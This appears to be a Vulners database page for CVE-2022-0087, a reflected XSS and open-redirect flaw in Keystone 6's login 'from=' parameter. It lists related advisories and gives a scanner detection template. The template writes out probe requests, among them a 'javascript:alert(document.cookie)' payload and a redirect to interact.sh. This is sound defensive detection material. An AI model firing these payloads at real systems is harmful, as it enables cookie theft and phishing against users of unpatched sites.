| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| CVE-2022-0087 | 12 Jan 202200:15 | – | attackerkb | |
| Cross-site Scripting (XSS) - Reflected in keystonejs/keystone | 30 Dec 202116:29 | – | huntr | |
| CVE-2022-0087 | 12 Jan 202202:31 | – | circl | |
| Keystone 跨站脚本漏洞 | 11 Jan 202200:00 | – | cnnvd | |
| keystone cross-site scripting vulnerability | 12 Jan 202200:00 | – | cnvd | |
| CVE-2022-0087 | 11 Jan 202223:20 | – | cve | |
| CVE-2022-0087 Cross-site Scripting (XSS) - Reflected in keystonejs/keystone | 11 Jan 202223:20 | – | cvelist | |
| Reflected cross-site scripting (XSS) vulnerability | 12 Jan 202221:55 | – | github | |
| CVE-2022-0087 | 12 Jan 202200:15 | – | nvd | |
| CVE-2022-0087 Cross-site Scripting (XSS) - Reflected in keystonejs/keystone | 11 Jan 202223:20 | – | osv |
id: CVE-2022-0087
info:
name: Keystone 6 Login Page - Open Redirect and Cross-Site Scripting
author: ShivanshKhari
severity: medium
description: |
On the login page, there is a "from=" parameter in URL which is vulnerable to open redirect and can be escalated to reflected XSS.
impact: |
Attackers can redirect users to malicious websites or inject malicious JavaScript via the from parameter, potentially facilitating phishing attacks or stealing user credentials.
remediation: |
Please upgrade to @keystone-6/auth >= 1.0.2, where this vulnerability has been closed. If you are using @keystone-next/auth, we strongly recommend you upgrade to @keystone-6
reference:
- https://huntr.com/bounties/c9d7374f-2cb9-4bac-9c90-a965942f413e
- https://nvd.nist.gov/vuln/detail/CVE-2022-0087
- https://github.com/keystonejs/keystone/commit/96bf833a23b1a0a5d365cf394467a943cc481b38
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-0087
cwe-id: CWE-79
epss-score: 0.02601
epss-percentile: 0.83409
cpe: cpe:2.3:a:keystonejs:keystone:*:*:*:*:*:node.js:*:*
metadata:
max-request: 2
vendor: keystonejs
product: keystone
framework: node.js
tags: cve,cve2022,keystone,redirect,xss,node.js,keystonejs,vuln
http:
- method: GET
path:
- "{{BaseURL}}/signin?from=https://interact.sh"
- "{{BaseURL}}/signin?from=javascript:alert(document.cookie)"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "Location: https://interact.sh"
- type: word
part: body
words:
- "alert(document.cookie)"
# digest: 4a0a004730450220070feaf44aed83f9ca75e30cf0cf95b654cc4feedaeb1a932ee1e3bd4e83d53702210082f0aa8527d5f7569b795439271548a89477c40588f34aab49165fa86ad3f8ab:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation